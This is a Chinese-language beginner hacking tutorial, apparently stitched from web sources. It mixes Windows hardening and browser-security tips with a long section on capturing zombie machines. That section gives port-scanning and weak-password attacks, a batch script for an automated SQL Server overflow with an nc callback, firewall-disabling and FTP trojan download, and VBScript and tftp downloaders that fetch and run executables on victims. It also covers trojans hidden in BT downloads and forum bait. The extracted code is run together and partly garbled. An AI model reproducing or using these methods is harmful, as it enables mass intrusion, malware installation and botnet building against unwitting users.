1、最简单的黑客入门教程目 录1 黑客简介 .22 保护自己电脑绝对不做黑客肉鸡 .23 抓肉鸡的几种方法 .54 防止黑客通过 Explorer 侵入系统 .95 SQL 注入详解 .105.1 注入工具 .115.2 php+Mysql 注入的误区 .115.3 简单的例子 .125.4 语句构造 .145.5 高级应用 .225.6 实例 .265.7 注入的防范 .295.8 我看暴库漏洞原理及规律 1.295.9 我看暴库漏洞原理及规律 2.326 跨站脚本攻击 .346.1 跨站脚本工具 .346.2 什么是 XSS 攻击 .356.3 如何寻找 XSS 漏洞 .356.4 寻找跨站漏
2、洞 .366.5 如何利用 .366.6 XSS 与其它技术的结合 .387 XPath 注入 .387.1 XPath 注入介绍 .387.2 XPath 注入工具 .41声明:文章来源大多是网上收集而来,版权归其原作者所有。1 黑客简介“黑客“(hacker)这个词通常被用来指那些恶意的安全破坏者。关于 “黑客“一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了“黑客“一词总是用于贬义环境。有些人认为,我们应该接受“黑客“一词已经被用滥并且有
3、了新的意义。他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。而我仍然认为,将黑客和恶意的骇客(cracker) 分开表述,对交流会更有效,比如使用 “恶意的安全骇客 “会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对“黑客“一词的滥用。之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用“黑客“这个词来描述才最贴切。如果你只是简单的将“黑客“和“恶意的安全骇客“划等号,将无法在与人交流安全技术问题时,轻松的分辨别人所指的到底是哪种类型的人。黑客和骇客的区
4、别是,黑客仅仅对技术感兴趣,而后者则是通过技术获取职业发展或者谋生。很多黑客和骇客都具有技术天赋,有些骇客据此进行职业发展。当然,并不是每个有技术天赋的人都必须沿着黑客或者骇客的方向发展。黑客这个术语的经典意义是指那些对于事物如何工作非常感兴趣的人,他们修理,制作或者修改事物,并以此为乐。对于某些人来说,这个词并不准确,而对于另一些人来说,黑客意味着最终能完全掌握某些事情。根据 RFC1392 的记载,互联网用户词汇将“黑客“定义为:迷恋于获取某些系统尤其是计算机和计算机网络系统内部运作机制的人。而这个词经常被错误的用于贬义环境。在贬义环境中,正确的用词应该是“骇客“。TheJargonWik
5、i 对于“黑客 “的首次定义为:迷恋于探知可编程系统细节以及如何扩展其功能的人,与大多数只需了解系统基本知识的人不同。而安全骇客,则是以破坏安全系统为目的的人。有些安全骇客最终会用自己所掌握的技术做善事,提供渗透测试服务,或者其他有利于安全防护的工作。而更多的人则是利用自己的技术行恶事。在 RFC1392 和JargonWiki 中都对“骇客“进行了类似的贬义定义。在不同的环境中使用正确的术语,对于沟通来说是非常重要的。在这方面我是有过切身体验的。一次与一家企业的负责人交流时,我们使用了相同的词汇,但是所指的对象却正好相反,结果沟通效果非常失败。当两种不同的背景下需要同一个词汇时,比如需要谈到
6、传统意义的黑客以及带有恶意目的的骇客时,如果不事先将术语解释清楚,或给出一定的规范,肯定会导致交流困难。对于目前的交流来说,一个更简单的办法就是只适用恶意安全骇客,而不是黑客,这是因为:目前大部分消息中所指的,都是带有恶意目的的骇客,而不是以技术为目标的黑客。这就是为什么在我的文章中,总是会使用“恶意的安全骇客“来代指从事恶意活动的人,而在某些文章中如果需要涉及到传统意义的“黑客“,我也会在文中再次进行说明。在讨论安全话题时,为了能更清晰的交流,我也建议大家和我一样采用正确的词汇。2 保护自己电脑绝对不做黑客肉鸡第一招:屏幕保护在 Windows 中启用了屏幕保护之后,只要我们离开计算机(或者
7、不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的安全。提示:部分设计不完善的屏幕保护程序没有屏蔽系统的“Ctrl+Alt+Del“ 的组合键,因此需要设置完成之后测试一下程序是否存在这个重大 Bug.不过,屏幕保护最快只能在用户离开 1 分钟之后自动启动,难道我们必须坐在计算机旁等待 N 分钟看到屏幕保护激活之后才能再离开吗?其实我们只要打开 Windows 安装目录里面的 system 子目录,然后找到相应的屏幕
8、保护程序(扩展名是 SCR),按住鼠标右键将它们拖曳到桌面上,选择弹出菜单中的“在当前位置创建快捷方式“命令,在桌面上为这些屏幕保护程序建立一个快捷方式。此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。第二招:巧妙隐藏硬盘在“按 Web 页“查看方式下,进入 Windows 目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件“,这时单击“显示文件“就可以进入该目录了。原因是在 Windows 根目录下有 desktop.ini 和 folder.htt 两个文件作祟。将这两个文件拷贝到某个驱动器的根
9、目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看“标签,选择“显示所有文件“,这样就可以看见这两个文件了)。再按“F5“键刷新一下,看看发生了什么,是不是和进入 Windows 目录时一样。接下来我们用“记事本 “打开 folder.htt,这是用 HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。如果你不懂 HTML 语言也没关系,先找到“显示文件“将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件“,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开“。将“要查看该文件夹的内容,请单击“改为“否则,后果自负!“,接着向
10、下拖动滑块到倒数第 9 行,找到“(file:/%TEMPLATEDIR%wvlogo.gif)“ 这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:tupiantupian1.jpg“替换“/“后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。当然,你还可以用像 Dreamweaver、FrontPage 这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“之间的内容就可以了。*ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0*usin
11、gthefile%THISDIRPATH%folder.htt.保存并退出,按“F5“ 键刷新一下,是不是很有个性? 接下来要作的就是用“超级兔子“将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将 folder.htt 原文件中“之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。第三招:禁用“开始“菜单命令在 Windows2000/XP 中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始运行“命令,在“运行“对话框的“打开“栏中输入“gpe
12、dit.msc“,然后单击“确定“按钮即可启动 WindowsXP 组策略编辑器。在“本地计算机策略“中,逐级展开“用户配置管理模板任务栏和开始菜单“分支,在右侧窗口中提供了“任务栏“和“开始菜单“的有关策略。在禁用“开始“菜单命令的时候,在右侧窗口中,提供了删除“开始“菜单中的公用程序组、“我的文档“图标、“文档“菜单、“网上邻居“图标等策略。清理“开始“菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档“图标为例,具体操作步骤为:1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标“选项。2)在弹出窗口的“设置“标签中,选择“已启用“单选按钮,然后单击“确定“
13、即可。第四招:桌面相关选项的禁用WindowsXP 的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略“中展开“用户配置管理模板桌面“分支,即可在右侧窗口中显示相应的策略选项。1)隐藏桌面的系统图标倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。若要隐藏桌面上的“网上邻居“和“InternetEXPlorer“图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标 “和“隐藏桌面上的 InternetEXPlorer 图标 “两个策略选项启用即
14、可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目“启用即可。当启用了“删除桌面上的我的文档图标“和“删除桌面上的我的电脑图标“两个选项以后,“我的电脑“和“我的文档“图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站“这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站“策略项启用。2)禁止对桌面的某些更改如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置“这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。第五招:禁止访问“控制面板
15、“如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略用户配置管理模板控制面板“分支,然后将右侧窗口的“禁止访问控制面板“策略启用即可。此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始“菜单中删除控制面板,同时这个设置还从 Windows 资源管理器中删除控制面板文件夹。提示:如果你想从上下文菜单的属性项目中选择一个“控制面板“项目,会出现一个消息,说明该设置防止这个操作。第六招:设置用户权限当多人共用一台计算机时,在 WindowsXP 中设置用户权限,可以按照以下步骤进行:
16、1)运行组策略编辑器程序。2)在编辑器窗口的左侧窗口中逐级展开“计算机配置Windows设置安全设置本地策略用户权限指派“分支。3)双击需要改变的用户权限,单击“添加用户或组“按钮,然后双击想指派给权限的用户账号,最后单击“确定“按钮退出。第七招:文件夹设置审核 WindowsXP 可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和 NTFS 分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置Windows 设置安全设置 本地策略“分支,然后在该分支下选择“审核
17、策略“选项。2)在右侧窗口中用鼠标双击“审核对象访问“选项。3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性“命令,接着在弹出的窗口中选择“安全“标签。4)单击“高级“按钮,然后选择“审核“标签。5)根据具体情况选择你的操作:倘若对一个新组或用户设置审核,可以单击“添加“按钮,并且在“名称“框中键入新用户名,然后单击“确定“按钮打开“审核项目“对话框。要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑“按钮。要删除原有的组或用户审核,可以选择用户名,然后单击“删除“按钮即可。6)如有必要的话,在“审核项目“对话框中的“应用到“列表中选取你希望审核的地方。7)如果
18、想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项“复选框。注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志“权限的用户可以审核文件或文件夹。在WindowsXP 审核文件、文件夹之前,你必须启用组策略中“审核策略“的“审核对象访问“。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。3 抓肉鸡的几种方法找点工具就 OK 了端口抓肉鸡的几种方法 肉鸡大家都应该清楚是什么东西吧!呵呵 这点就不用说了.慢慢学1、3389 抓鸡现在国内网络上流传着一种克隆版的 XP,安装后会默认开启一个账号为 new,密
19、码为空的账户,而且基本上都是开着 3389 的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具扫一段 IP 的 3389 端口,扫完后就直接用远程桌面连接开放 3389 的机器(也可以把结果保存为文本文件,用批量生成 3389 连接的工具来连接) ,然后输入账号 new 登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉这种方法只针 XP 系统,如果遇到 2000 或者 2003 系统就不要试了呵呵。缺点也很明显,如果别人不是用 new 账号登入 XP 的,你再登入上去就会把他挤出去(XP 只支持单用户登入,用户登入需要用工具开) ,或者电脑前有人你就不可能去打开IE 下
20、载木马了。2、扫 135 端口抓肉鸡首先先用端口扫描器扫一段 IP 的 135 端口,然后把结果保存,再用 NTSCAN 过滤有弱口令的机器,最后用 recton 开 telnet 传马。因为现在 135 和 445 端口都被防火墙屏蔽了,只能扫本地的 135 肉鸡,要抓外地的只能用外地的 135 肉鸡来扫。 (详细动画可以去黑客网站搜索 135)3、扫 445 端口抓肉鸡和扫 135 抓肉鸡差不多,首先先用端口扫描器扫一段 IP 的 445 端口,然后把结果保存,再用 NTSCAN 过滤有弱口令的机器,最后用啊 D 工具包开共享传马。因为现在 135 和445 端口都被防火墙屏蔽了,只能扫本
21、地的 445 肉鸡,要抓外地的只能用外地的 445 肉鸡来扫。 (详细动画可以去黑客网站搜索 445)4、1433 端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡,不过现在太多人搞,成功率已经不高了。要用到的工具:S 扫 sqlhello.exenc.exe 批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat 文件echoofffor/f“eol=;tokens=1,2delims=“%iin(tt.txt)dos.exetcp%i%j14331000/saveechoofffor/f“eol=;tokens=1delims=“%iin(Result.txt)
22、dosqlhello%i1433xxx.xxx.xx.xx556还要新建一个 tt.txt,里面你要扫的 IP 段,格式为XXX.XXX.XXX.XXXXXX.XXX.XXX.XXX,中间是空格1433 是要扫描的端口, 1000 是扫描线程数,dosqlhello%i1433xxx.xxx.xx.xx556 这个里的 XXX 添你的 IP,556 是后面 NC 监听的端口然后再写个批处理echooffNc-l-vv-p556daima.txtechousernamedaima.txtechopassworddaima.txtechobindaima.txt(以 2 进制传输数据)echoge
23、txxx.exe(你的木马的文件名, 要放在根目录下)daima.txtechobyedaima.txtnetstopsharedaccess(关闭 WINDOWS 自带防火墙)ftp-s:daima.txtxxx.exe(也是填你木马的文件名)deldaima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。几种肉鸡上传文件的方法tftp 法先在自己某机器上建个 tftp 服务器,如执行 tftpd32.exe,再将文件(sample.exe)上传到别的机器中( 肉鸡) ,肉鸡 cmd 中执行:tftp-i 服务器 ipgetsample.exeftp 法肉鸡 cmd 中执行:ec
24、hoopenftp 服务器 ip端口ftp.txtechousernameftp.txtechopasswordftp.txtechogetsample.exeftp.txtechobyeftp.txtftp-s:ftp.txtdelftp.txt工具法利用 wineggdrop 的 wget.exe肉鸡 cmd 中执行:wget 网站/sample.exe利用 dl.vbe 法肉鸡 cmd 中执行:echowithwscript:if.arguments.countdl.vbeechosetaso=.createobject(“adodb.stream“):setweb=createobje
25、ct(“microsoft.xmlhttp“)dl.vbeechoweb.open“get“,.arguments(0),0:web.send:ifweb.status200thenquitdl.vbeechoaso.type=1:aso.open:aso.writeweb.responsebody:aso.savetofile.arguments(1),2:endwithdl.vbecscriptdl.vbehttp:/*。* 。*。*:88/sample.exesample.exe利用 iget.vbe 法方法同 4,肉鸡 cmd 中执行:echoiLocal=LCase(WScript.
26、Arguments(1)iget.vbeechoiRemote=LCase(WScript.Arguments(0)iget.vbeechoSetxPost=CreateObject(“Microsoft.XMLHTTP“)iget.vbeechoxPost.Open“GET“,iRemote,0iget.vbeechoxPost.Send()iget.vbeechoSetsGet=CreateObject(“ADODB.Stream“)iget.vbeechosGet.Mode=3iget.vbeechosGet.Type=1iget.vbeechosGet.Open()iget.vbeec
27、hosGet.Write(xPost.responseBody)iget.vbeechosGet.SaveToFileiLocal,2iget.vbecscriptiget.vbehttp:/*。 *。*。*/sample.exesample.exe利用 Http 网站 vbe 法echoSetxPost=CreateObject(“Microsoft.XMLHTTP“)dsa.vbeechoxPost.Open“GET“,“http:/*.*.*.*/sample.exe“,0dsa.vbeechoxPost.Send()dsa.vbeechoSetsGet=CreateObject(“AD
28、ODB.Stream“)dsa.vbeechosGet.Mode=3dsa.vbeechosGet.Type=1dsa.vbeechosGet.Open()dsa.vbeechosGet.Write(xPost.responseBody)dsa.vbeechosGet.SaveToFile“sample.exe“,2dsa.vbecscriptdsa.vbedeldsa.vbe3389 法可以开 3389,然后登陆,进行本地的下载。该方法对服务器上传很严格的机器特有效。 (包括硬件防火墙)先打开多个 NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出
29、,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有 4221 端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索 1433。忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下,打这么多字累死了继续5、扫 1433 抓肉鸡之方法 2要用到的工具:端口扫描器 X-scanSQL 综合利用工具上面我们说过了,1433 溢出现在成功率已经不高了,所以我们可以用另一种方法。开了 1433 端口的机器一般都装了 SQL,所以我们可以猜测 SQL 弱口令来抓 1433 肉鸡。首先先用端口扫描器扫一段 IP 的 1433 端口,然后结果保存为文本文件,接着用
30、 X-scan 导入这些开了 1433 的 IP,然后在扫描参数-全局设置- 扫描模块这一栏里只勾上 SQL-SERVER 就可以了,其他不要勾。然后在插件设置-端口相关设置- 待检测端口这一栏,只填 1433 端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开 SQL 综合利用工具,输入你扫到的弱口令来连接,接着打开 SQL 综合利用工具-利用目录,上传你的木马,然后在用 DOS 命令执行你的木马就OK 了。6、用 WINNTAutoAttack 扫 SA 弱口令抓肉鸡其实这个原理和上面一样,效率也没上面的高,只是想让大家知道下,呵呵。工具:WINNTAutoA
31、ttackSQL 综合利用工具打开 WINNTAutoAttack,找一段 IP 添上,然后只勾上设置下的仅对 PING 检查成功的机器进行检测和 SQL 列出密码为空的 SA账号,接着开始扫描,扫完后,用 SQL 综合利用工具连上传马执行就好了。7、扫 4899 空口令抓肉鸡工具:端口扫描器 4899 探测器 Radmin首先先用端口扫描器扫一段 IP 的 4899 端口,然后用 4899 探测器导入开了 4899 端口的 IP,接着扫空令,最后用 Radmin 连接有空口令的机器,带开文件管理,上传的你木马运行就 OK 了。详细动画可以去黑客网站搜索 48998、扫 5900 端口抓 VN
32、C 肉鸡工具:VNC 扫描器 VNC 连接器首先用 VNC 扫描器扫描一段 IP,扫描格式为 vscan.exe(扫描器文件名)-i219.0.0.0-219.255.255.255(扫描 IP 段)-p5900-vnc-vv 扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列 IP,IP 后面的有一些单词比如patched,banned,vulnerable,只有单词为 vulnerable 才能连接。接着就用 VNC 连接器连接,下面就不用多说了吧?详细动画可以去黑客网站搜索 VNC接下来说说挂马抓肉鸡吧。方法有很多,比如 BT 挂马、免费空间挂马、迅雷挂马等等,有些我也还
33、不会,呵呵。下面就介绍几种我会的。1、BT 挂马顾名思义,就是把你的木马发布到 BT 网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的 BT 网站也不让发布 EXE 文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR 文件发布,谁在开始下载时会知道 RAR 里有木马呢?当他费了好大劲下载完,打开发现是 EXE 的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX 片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道 RM 和 EX
34、E 文件可以插入) ,别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如 RM 捆绑木马后保持 RM 格式) ,那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和 BT 种子文件绑在一起发布,那样你肉鸡不抓疯了才怪所以在这里说一下,木马和其他文件捆绑后生成的文件只能为 EXE 格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知
35、道了吧。在这里就说一个最近的 RAR 溢出漏洞,针对 winrar3.6 版本以下的所有版本,只要你 winrar 版本低于 3.6,运行绑了牧马的 RAR 文件后就会中马。此类木马症状为:运行 RAR 文件后会弹出一个什么什么损坏还是错误的对话框,然后 RAR 文件体积变小,减少的体积就为木马的体积。然后再次打开这个 RAR 文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下 WINRAR 版本,小心中马哈。2、免费空间挂马其实和 BT 差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像 BT 那样做种子,那样不仅要开着电脑,
36、还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到 2 个 XXX 论坛发个帖子,每天睡前一顶。 上面有好多可以学的,不清楚的问下我4 防止黑客通过 Explorer 侵入系统给点票票撒.好不容易研究出来的哦 绝对实用. 恶意黑客和病毒编译者能利用你邮件和网页浏览软件中的不安全设置来侵入你的电脑。他们可以通过给你发电子邮件或者诱惑你浏览含有恶意代码的网页来达到他们的目的。通过提高你的微软 IE 浏览器,Outltlook 和 OutlookExpress 的安全设置,可以来帮助你减小被攻击的可能。恶意黑客和病毒编译者能利用你邮件和网页浏览软件中的不安全设置来侵入你的电脑。他们可以
37、通过给你发电子邮件或者诱惑你浏览含有恶意代码的网页来达到他们的目的。通过提高你的微软 IE 浏览器,Outltlook 和 OutlookExpress 的安全设置,可以来帮助你减小被攻击的可能。步骤一:设置你浏览器安全级别为高在你使用 IE 浏览器来浏览网页的时候来提升安全等级:1.在 IE 的工具菜单中点击 Internet 选项。2.在 InternetOptions 的对话框中,点击安全标签,并选择 Internet 图标。3.在该区域的安全级别选项中,滑动滑条至最高点。这样设置你浏览的所有网站的安全级别为最高。(如果没有滑动条,点击默认级别然后再滑动滑条至最高点。)注意:高的设置可能
38、导致一些网站不可以正常浏览。如果你在改变这个设置后难以正常浏览网页,你可以将你要浏览的网页加到受信任站点列表当中。这将允许网页可以在高安全设置的情况下正常浏览。步骤二:加安全网站到受信任站点列表设置 IE 安全级别到高可能导致一些网站步可以正常访问,这其中包括了MicrosoftWindows?Update。如果你在改变了设置后不能正常访问网站,你可以把他们加到受信任站点的列表当中,这将令网站可正常工作。微软建议先将 Windowsupdatehttp:/)加入受信任站点列表,从而你能直接安装总要的系统升级。加安全网站到受信任站点列表:1.在 IE 工具菜单,点击 Internet 选项。2.
39、在 Internet 选项的对话框中,点击安全标签。3.点击受信任站点的图标,并点击网站按钮。4.在受信任站点对话框中,输入网站的 URL 在“将该网站添加到区域中 “的对话框里,并且点击添加。受信任站点的特点是只能用以 Http:开头的 URL。取消对该区域中的所有站点要求服务器验证的选项。5.点击确定。6.在该区域的安全级别中,移动滑条至中级。这样就设定所有你信赖的站点的安全级别为中级。(如果没有滑动条,点击默认级别然后再滑动滑条至最高点。)步骤三:以明文阅读电子邮件信息为了帮助提高你的电子邮件的安全性,设置 Outlook 或者 OutlookExpress 为明文阅读所有信息。在 Ou
40、tlookExpress 设置明文阅读信息:1.在 OutlookExpress 工具菜单中,点击选项。2.在选项对话框中,点击阅读标签。3.选择明文阅读所有信息。4.点击确定。在 Outlook 设置明文阅读信息:1.在 OutlookExpress 工具菜单中,点击选项。2.在选项对话框中首选参数的标签下,点击电子邮件选项按钮。3.在 E-mail 选项对话框中,选择阅读以文本格式阅读所有标准邮件。4.点击确定来关闭 E-mail 选项对话框,再点击确定关闭选项对话框。步骤四:在你的浏览器中阻止弹出窗口为了保护你的电脑不受恶意弹出窗口的影响,而采取一定的措施来阻止他们打开。一些网站使用小的浏览窗口来显示广告,有时会是一些烦人的内容。恶意的攻击者也可能利用弹出窗口伪装成广告或者建议来在你的电脑上安装恶意代码。有效的办法是你在你的浏览器中安装一个防止弹出窗口的工具。大部分类似的软件与 IE都是兼容的,其中就包括免费的 MSN 工具栏。5 SQL 注入详解2003 年开始,喜欢脚本攻击的人越来越多,而且研究 ASP 下注入的朋友也逐渐多了起来,我看过最早的关于 SQL 注入的文章是一篇 99 年国外的高手写的